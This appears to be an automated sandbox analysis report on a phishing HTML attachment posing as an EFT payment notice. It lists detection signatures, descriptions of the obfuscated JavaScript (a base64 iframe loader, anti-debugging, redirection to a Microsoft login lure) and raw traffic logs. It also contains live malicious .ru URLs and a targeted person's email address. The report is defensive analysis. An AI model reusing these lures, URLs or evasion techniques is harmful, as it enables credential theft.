Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
EFT_Payment_Notification_Warriorsheart.html

Overview

General Information

Sample name:EFT_Payment_Notification_Warriorsheart.html
Analysis ID:1590262
MD5:54884622bdfd2d41c5f7de404df998d6
SHA1:5fe436306c3ade0bbf69a9347750e1824b2a56ed
SHA256:517f5778d40ff3a5956f7938ea4a516730c0b69083ae1305498e72c8ab7fb0fc
Infos:

Detection

HTMLPhisher
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
HTML file submission requesting Cloudflare captcha challenge
Yara detected HtmlPhish54
AI detected suspicious Javascript
Detected javascript redirector / loader
HTML IFrame injector detected
HTML Script injector detected
HTML document with suspicious name
HTML document with suspicious title
HTML file submission containing password form
HTML page contains suspicious base64 encoded javascript
Detected non-DNS traffic on DNS port
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
None HTTPS page querying sensitive user data (password, username or email)
Stores files to the Windows start menu directory

Classification

  • System is w10x64
  • chrome.exe (PID: 3092 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\EFT_Payment_Notification_Warriorsheart.html" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 3184 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1820,i,6564301633769382234,10508467328099275004,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
1.3.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
    No Sigma rule has matched
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: https://rfll.yordickyel.ru/16E/Avira URL Cloud: Label: phishing
    Source: https://s8zvm920jqjiu0mkvwrkbz6zbaapggwaat1ppvh6sofcvojnfpayo.mentespic.ru/tpsifzxrcjpnmiqlcapcxqSIHzEofYKCVZVKRCCQIPXIQHQALLZRCDVNUAXOAvira URL Cloud: Label: malware

    Phishing

    barindex
    Source: Yara matchFile source: 1.3.pages.csv, type: HTML
    Source: 0.3.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://rfll.yordickyel.ru/16E/#dGluYS5kdXRjaGVyQH... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The script collects user data and sends it to an unknown domain, and it also redirects the user to a Microsoft login page, which is likely a phishing attempt. Overall, the script demonstrates malicious intent and poses a significant security risk.
    Source: 0.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://rfll.yordickyel.ru/16E/#dGluYS5kdXRjaGVyQH... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The use of obfuscated code and the presence of anti-debugging techniques further increase the risk. While the script may have some legitimate functionality, the overall behavior is highly suspicious and indicative of malicious intent.
    Source: 0.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://rfll.yordickyel.ru/16E/#dGluYS5kdXRjaGVyQH... This script exhibits several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to a suspicious domain. The script also uses a setInterval loop with a debugger statement, which could be an attempt to detect and evade analysis. Overall, this script demonstrates highly suspicious and potentially malicious behavior, warranting a high-risk score.
    Source: 0.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: file:///C:/Users/user/Desktop/EFT_Payment_Notifi... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The script uses the `location.hash` property to store and retrieve an encoded email address, which is then used to construct a URL for an iframe. The iframe's source is also obfuscated using `atob()` to decode a base64-encoded string. These behaviors are highly suspicious and indicate a potential attempt to execute malicious code or redirect the user to a malicious site.
    Source: EFT_Payment_Notification_Warriorsheart.htmlHTTP Parser: Low number of body elements: 1
    Source: file:///C:/Users/user/Desktop/EFT_Payment_Notification_Warriorsheart.html#dGluYS5kdXRjaGVyQHdhcnJpb3JzaGVhcnQuY29tHTTP Parser: New IFrame, src: https://rFLL.yordickyel.ru/16E/#dGluYS5kdXRjaGVyQHdhcnJpb3JzaGVhcnQuY29t
    Source: file:///C:/Users/user/Desktop/EFT_Payment_Notification_Warriorsheart.html#dGluYS5kdXRjaGVyQHdhcnJpb3JzaGVhcnQuY29tHTTP Parser: New script, src: https://code.jquery.com/jquery-3.6.0.min.js
    Source: file:///C:/Users/user/Desktop/EFT_Payment_Notification_Warriorsheart.html#dGluYS5kdXRjaGVyQHdhcnJpb3JzaGVhcnQuY29tHTTP Parser: New script tag found
    Source: file:///C:/Users/user/Desktop/EFT_Payment_Notification_Warriorsheart.html#dGluYS5kdXRjaGVyQHdhcnJpb3JzaGVhcnQuY29tHTTP Parser: New script tag found
    Source: file:///C:/Users/user/Desktop/EFT_Payment_Notification_Warriorsheart.html#dGluYS5kdXRjaGVyQHdhcnJpb3JzaGVhcnQuY29tTab title: EFT_Payment_Notification_Warriorsheart.html
    Source: EFT_Payment_Notification_Warriorsheart.htmlHTTP Parser: Base64 decoded: document.write
    Source: file:///C:/Users/user/Desktop/EFT_Payment_Notification_Warriorsheart.html#dGluYS5kdXRjaGVyQHdhcnJpb3JzaGVhcnQuY29tHTTP Parser: Number of links: 0
    Source: EFT_Payment_Notification_Warriorsheart.htmlHTTP Parser: Base64 decoded: tina.dutcher@warriorsheart.com
    Source: file:///C:/Users/user/Desktop/EFT_Payment_Notification_Warriorsheart.html#dGluYS5kdXRjaGVyQHdhcnJpb3JzaGVhcnQuY29tHTTP Parser: Title: Redirecting does not match URL
    Source: file:///C:/Users/user/Desktop/EFT_Payment_Notification_Warriorsheart.html#dGluYS5kdXRjaGVyQHdhcnJpb3JzaGVhcnQuY29tHTTP Parser: Has password / email / username input fields
    Source: EFT_Payment_Notification_Warriorsheart.htmlHTTP Parser: No favicon
    Source: file:///C:/Users/user/Desktop/EFT_Payment_Notification_Warriorsheart.html#dGluYS5kdXRjaGVyQHdhcnJpb3JzaGVhcnQuY29tHTTP Parser: No favicon
    Source: file:///C:/Users/user/Desktop/EFT_Payment_Notification_Warriorsheart.html#dGluYS5kdXRjaGVyQHdhcnJpb3JzaGVhcnQuY29tHTTP Parser: No favicon
    Source: file:///C:/Users/user/Desktop/EFT_Payment_Notification_Warriorsheart.html#dGluYS5kdXRjaGVyQHdhcnJpb3JzaGVhcnQuY29tHTTP Parser: No favicon
    Source: file:///C:/Users/user/Desktop/EFT_Payment_Notification_Warriorsheart.html#dGluYS5kdXRjaGVyQHdhcnJpb3JzaGVhcnQuY29tHTTP Parser: No <meta name="author".. found
    Source: file:///C:/Users/user/Desktop/EFT_Payment_Notification_Warriorsheart.html#dGluYS5kdXRjaGVyQHdhcnJpb3JzaGVhcnQuY29tHTTP Parser: No <meta name="copyright".. found
    Source: global trafficTCP traffic: 192.168.2.5:49704 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.5:49719 -> 1.1.1.1:53
    Source: Joe Sandbox ViewIP Address: 104.17.24.14 104.17.24.14
    Source: Joe Sandbox ViewIP Address: 104.18.94.41 104.18.94.41
    Source: Joe Sandbox ViewIP Address: 151.101.130.137 151.101.130.137
    Source: Joe Sandbox ViewIP Address: 151.101.130.137 151.101.130.137
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /16E/ HTTP/1.1Host: rfll.yordickyel.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://rfll.yordickyel.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://rfll.yordickyel.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://rfll.yordickyel.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://rfll.yordickyel.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/ttfv6/0x4AAAAAAA4pnGQDZ108QgTx/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://rfll.yordickyel.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=9017f0c19bf64357&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/ttfv6/0x4AAAAAAA4pnGQDZ108QgTx/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/ttfv6/0x4AAAAAAA4pnGQDZ108QgTx/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=9017f0c19bf64357&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1491089504:1736795691:_2M0zyAcgPOuW97IkhXnYsXlr57SU1M4wgTcK-1QGCY/9017f0c19bf64357/60hVcdymwMdF.kHrUj8sh4qMzB_LYBdwV7QA5YSJEa4-1736798090-1.1.1.1-toacKPVl_FCZPddV4C0wsyR6bPaSl0bKqxISI91DDVq0YUt2ql4_H2fb7727RIYs HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/9017f0c19bf64357/1736798092090/f65b749e6380f3d0be864737123b3cacba5c88d365ed8513907c381f725621c4/7je5Kn2j8A5PYz6 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/ttfv6/0x4AAAAAAA4pnGQDZ108QgTx/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/9017f0c19bf64357/1736798092091/WvlYSSUVjyD9zH9 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/ttfv6/0x4AAAAAAA4pnGQDZ108QgTx/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/9017f0c19bf64357/1736798092091/WvlYSSUVjyD9zH9 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1491089504:1736795691:_2M0zyAcgPOuW97IkhXnYsXlr57SU1M4wgTcK-1QGCY/9017f0c19bf64357/60hVcdymwMdF.kHrUj8sh4qMzB_LYBdwV7QA5YSJEa4-1736798090-1.1.1.1-toacKPVl_FCZPddV4C0wsyR6bPaSl0bKqxISI91DDVq0YUt2ql4_H2fb7727RIYs HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1491089504:1736795691:_2M0zyAcgPOuW97IkhXnYsXlr57SU1M4wgTcK-1QGCY/9017f0c19bf64357/60hVcdymwMdF.kHrUj8sh4qMzB_LYBdwV7QA5YSJEa4-1736798090-1.1.1.1-toacKPVl_FCZPddV4C0wsyR6bPaSl0bKqxISI91DDVq0YUt2ql4_H2fb7727RIYs HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /tpsifzxrcjpnmiqlcapcxqSIHzEofYKCVZVKRCCQIPXIQHQALLZRCDVNUAXO HTTP/1.1Host: s8zvm920jqjiu0mkvwrkbz6zbaapggwaat1ppvh6sofcvojnfpayo.mentespic.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://rfll.yordickyel.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://rfll.yordickyel.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /tpsifzxrcjpnmiqlcapcxqSIHzEofYKCVZVKRCCQIPXIQHQALLZRCDVNUAXO HTTP/1.1Host: s8zvm920jqjiu0mkvwrkbz6zbaapggwaat1ppvh6sofcvojnfpayo.mentespic.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficDNS traffic detected: DNS query: rfll.yordickyel.ru
    Source: global trafficDNS traffic detected: DNS query: code.jquery.com
    Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: s8zvm920jqjiu0mkvwrkbz6zbaapggwaat1ppvh6sofcvojnfpayo.mentespic.ru
    Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
    Source: global trafficDNS traffic detected: DNS query: www.office.com
    Source: global trafficDNS traffic detected: DNS query: identity.nel.measure.office.net
    Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/1491089504:1736795691:_2M0zyAcgPOuW97IkhXnYsXlr57SU1M4wgTcK-1QGCY/9017f0c19bf64357/60hVcdymwMdF.kHrUj8sh4qMzB_LYBdwV7QA5YSJEa4-1736798090-1.1.1.1-toacKPVl_FCZPddV4C0wsyR6bPaSl0bKqxISI91DDVq0YUt2ql4_H2fb7727RIYs HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3204sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedCF-Chl-RetryAttempt: 0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: 60hVcdymwMdF.kHrUj8sh4qMzB_LYBdwV7QA5YSJEa4-1736798090-1.1.1.1-toacKPVl_FCZPddV4C0wsyR6bPaSl0bKqxISI91DDVq0YUt2ql4_H2fb7727RIYssec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/ttfv6/0x4AAAAAAA4pnGQDZ108QgTx/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 19:54:53 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: IFmTYuJe7ph5c+MSSsAQDA==$6NDurffhG5BQk+RmU8OviQ==Server: cloudflareCF-RAY: 9017f0d17d9c238a-EWRalt-svc: h3=":443"; ma=86400
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 19:54:56 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: p0c/ezzGGc7ZuCnArU2LMw==$X2YlRT2yCtVmnJ20U6dcyw==Server: cloudflareCF-RAY: 9017f0e79f1ac46d-EWRalt-svc: h3=":443"; ma=86400
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 19:55:07 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: p3S9HVFZ8zcvjAh6VE5pjg==$fQNIWr3wXLhX+B1smsJjtw==cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 9017f12d6c0572b7-EWRalt-svc: h3=":443"; ma=86400
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
    Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
